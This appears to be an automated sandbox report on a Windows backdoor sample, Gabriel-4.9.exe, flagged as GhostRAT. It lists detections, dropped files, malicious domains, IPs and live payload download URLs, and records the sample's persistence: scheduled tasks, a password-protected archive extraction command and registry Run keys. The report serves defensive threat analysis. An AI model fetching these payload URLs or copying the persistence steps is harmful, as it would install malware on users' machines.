DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	21 Process Injection	13 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	/etc/passwd and /etc/shadow	2 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	251 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Indicator Removal	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Gabriel-4.9.exe	11%	Virustotal		Browse
Gabriel-4.9.exe	13%	ReversingLabs	Win32.Backdoor.GhostRAT

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\ProgramData\Program\iusb3mon.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	100%	Joe Sandbox ML
C:\ProgramData\Program\iusb3mon.exe	100%	Joe Sandbox ML
C:\Program Files\product1\letsvpn-latest.exe	3%	ReversingLabs
C:\ProgramData\Program\iusb3mon.exe	42%	ReversingLabs	Win32.Spyware.Generic
C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	42%	ReversingLabs	Win32.Spyware.Generic
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ooddoo.top/abc/1L9i	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/47.exeqLyi	0%	Avira URL Cloud	safe
http://ooddoo.top/abc/47.exeQL	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/47.exe	0%	Avira URL Cloud	safe
http://www.yourcompany.com	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/47.exer	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/	0%	Avira URL Cloud	safe
https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/47.exeLoa	0%	Avira URL Cloud	safe
https://ooddoo.top/abc/47.exeZ	0%	Avira URL Cloud	safe
http://%s/ip.txtMozilla/4.0	0%	Avira URL Cloud	safe
http://www.indigorose.com/route.php?pid=suf9buy	0%	Avira URL Cloud	safe
http://ooddoo.top/abc/47.exel	0%	Avira URL Cloud	safe
http://ooddoo.top/abc/47.exeu	0%	Avira URL Cloud	safe
http://www.indigorose.com	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
http://crl.microU	0%	Avira URL Cloud	safe
http://ooddoo.top/abc/	0%	Avira URL Cloud	safe
http://ooddoo.top/abc/47.exe	0%	Avira URL Cloud	safe
http://www.indigorose.com/route.php?pid=suf9buyd	0%	Avira URL Cloud	safe
https://ooddoo.top/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ooddoo.top	172.67.165.100	true	true		unknown
huazai168.com	118.107.45.13	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ooddoo.top/abc/47.exe	true	Avira URL Cloud: safe	unknown
http://ooddoo.top/abc/47.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://down.360safe.com/setup.exe	MTGHu7b.exe, 00000012.00000003.2432673167.0000000002890000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000003.2581236847.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://ooddoo.top/abc/47.exeQL	irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ooddoo.top/abc/1L9i	irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ooddoo.top/abc/47.exer	irsetup.exe, 00000002.00000003.2428996975.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
http://www.yourcompany.com	irsetup.exe, 00000002.00000003.2095316635.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ooddoo.top/abc/	irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
https://ooddoo.top/abc/47.exeLoa	irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000013.00000002.2489937666.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2476130879.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2493698942.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2497767102.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2669271131.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://netmon.stat.360safe.com	MTGHu7b.exe, 00000012.00000003.2432673167.0000000002890000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000003.2581236847.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmp	false		high
https://ooddoo.top/abc/47.exeZ	irsetup.exe, 00000002.00000002.4674992748.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2428996975.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.2250729891.0000028F9027C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2250729891.0000028F903B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2229248625.0000028F81BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559353218.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2545073218.00000000063B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2569290893.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2587202088.000000000661F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ooddoo.top/abc/47.exeqLyi	irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.orgX	powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe	irsetup.exe, 00000002.00000003.2095316635.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.2229248625.0000028F80201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2489937666.00000000048F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2476130879.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2493698942.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2497767102.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2669271131.0000000004D91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.2250729891.0000028F9027C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2250729891.0000028F903B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2229248625.0000028F81BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559353218.0000000005958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2545073218.00000000063B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2569290893.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2587202088.0000000006630000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://%s/ip.txtMozilla/4.0	irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2853070590.0000000007160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000016.00000002.2493698942.0000000004D06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000002E.00000002.2822229421.0000000005DFA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000024.00000003.2471948354.00000256EEA20000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000024.00000002.4140413540.00000256EEC00000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	irsetup.exe, 00000002.00000003.2123277659.00000000054F7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ooddoo.top/abc/47.exel	irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ooddoo.top/abc/	irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4678265123.0000000003890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indigorose.com/route.php?pid=suf9buy	Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4679398558.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2093783473.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microU	powershell.exe, 00000016.00000002.2588197051.000000000720E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000002E.00000002.2669271131.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ooddoo.top/abc/47.exeu	irsetup.exe, 00000002.00000002.4674992748.0000000002A60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indigorose.com	Gabriel-4.9.exe, 00000000.00000002.2228673993.0000000002070000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 00000024.00000003.2471948354.00000256EEA7E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	irsetup.exe, 00000002.00000002.4664793853.00000000006CB000.00000004.00000010.00020000.00000000.sdmp	false		high
http://%s/ip.txt	irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000000C.00000002.2229248625.0000028F80201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.360.cn	irsetup.exe, 00000002.00000003.2428996975.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 0000000C.00000002.2229248625.0000028F816B9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indigorose.com/route.php?pid=suf9buyd	Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4679398558.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2093783473.00007FF7A0C5A000.00000002.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://ooddoo.top/	irsetup.exe, 00000002.00000002.4667770320.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2429092754.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
118.107.45.13	huazai168.com	Singapore		64050	BCPL-SGBGPNETGlobalASNSG	true
172.67.165.100	ooddoo.top	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581840
Start date and time:	2024-12-29 04:23:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	163
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Gabriel-4.9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@244/105@2/3
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 184.30.17.174, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3472 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3688 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5720 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5852 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:24:35	Task Scheduler	Run new task: UserLoginStartupTask path: C:\ProgramData\program\iusb3mon.exe
04:24:41	Task Scheduler	Run new task: Windows Audio Endpoint Builder() path: C:\ProgramData\Data\un.exe s>x -o- -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\ /st
04:24:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
04:25:10	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
04:25:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
04:25:58	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
22:24:08	API Interceptor	391x Sleep call for process: powershell.exe modified
22:24:33	API Interceptor	573385x Sleep call for process: MTGHu7b.exe modified
22:24:37	API Interceptor	3x Sleep call for process: svchost.exe modified
22:24:52	API Interceptor	2852x Sleep call for process: iusb3mon.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html	Get hash	malicious	Unknown	Browse	104.21.77.48
	EjS7Q5fFCE.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.186.200
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.160.84
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	172.67.160.84
	aimware.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.132.55
	https://belasting.online-factuur.com	Get hash	malicious	Unknown	Browse	172.67.171.151
	https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310	Get hash	malicious	KnowBe4	Browse	1.1.1.1
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.66.86
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
BCPL-SGBGPNETGlobalASNSG	MEuu1a2o6n.exe	Get hash	malicious	GhostRat	Browse	118.107.44.219
	OdiHmn3pRK.exe	Get hash	malicious	Unknown	Browse	118.107.44.219
	S1Rv3ioghk.exe	Get hash	malicious	Unknown	Browse	118.107.44.112
	WiezmDFd6L.exe	Get hash	malicious	Unknown	Browse	134.122.155.90
	armv7l.elf	Get hash	malicious	Unknown	Browse	134.122.132.194
	492c3445eddadc4b2c411a6eb79813339a0b3fc6d2d69.dll	Get hash	malicious	Unknown	Browse	134.122.134.93
	rQuotation.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	3.elf	Get hash	malicious	Unknown	Browse	137.220.247.57
	MicrosoftEdgeUpdateSetup.exe	Get hash	malicious	Unknown	Browse	134.122.134.93
	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	134.122.191.187

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	setup.msi	Get hash	malicious	Unknown	Browse	172.67.165.100
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	172.67.165.100
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	172.67.165.100
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	172.67.165.100
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	172.67.165.100
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.165.100
	Setup.exe	Get hash	malicious	Unknown	Browse	172.67.165.100
	Setup.exe	Get hash	malicious	Unknown	Browse	172.67.165.100
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.165.100
	search.hta	Get hash	malicious	Unknown	Browse	172.67.165.100

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	15405152
Entropy (8bit):	7.9969741858269074
Encrypted:	true
SSDEEP:	393216:3Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpw:3Rh8B2vB2c+kZD
MD5:	E039E221B48FC7C02517D127E158B89F
SHA1:	79EED88061472AE590616556F31576CA13BFC7FB
SHA-256:	DC30E5DAB15392627D30A506F6304030C581FC00716703FC31ADD10FF263D70B
SHA-512:	87231C025BB94771E89A639C9CB1528763F096059F8806227B8AB45A8F1EA5CD3D94FDC91CB20DD140B91A14904653517F7B6673A142A864A58A2726D14AE4B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j..........R5............@..........................p............@..............................................................'...........................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata...@...P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Download File

Process:	C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3810
Entropy (8bit):	3.5689360433547153
Encrypted:	false
SSDEEP:	96:tCnRigEptnknQGdinigV9ll7dHAmzFzJE+:WRGryQxnjrHy+
MD5:	69C282FDCD177C1AC4D6709EF841DA65
SHA1:	575CBAC132F5215C9446E6B440CA44A2082F0644
SHA-256:	943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
SHA-512:	6B686A5D6AABE4681C6E1C83D4F32BD55D9FA26FC25ED72ECD20676C6DD3BD49CEE4F1E5D1B25F2D3A90A994BE00BF3B1366075272D4C3EA16917806DBBE0EA7
Malicious:	true
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.2.7.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.A.u.t.h.o.r.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.U.s.e.r.I.d.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.U.s.e.r.I.d.>..... . . . . . .<.L.o.g.o.n.T.

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	C788EDB928436D0CE10A5BF198837D8A
SHA1:	F104B6AB797E0B16362BFB69F5000407CE6EFFD8
SHA-256:	E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
SHA-512:	61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
Malicious:	false
Preview:	*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7304173028364713
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0t:9JZj5MiKNnNhoxuw
MD5:	726395C2270E25D32450A974152D5A0F
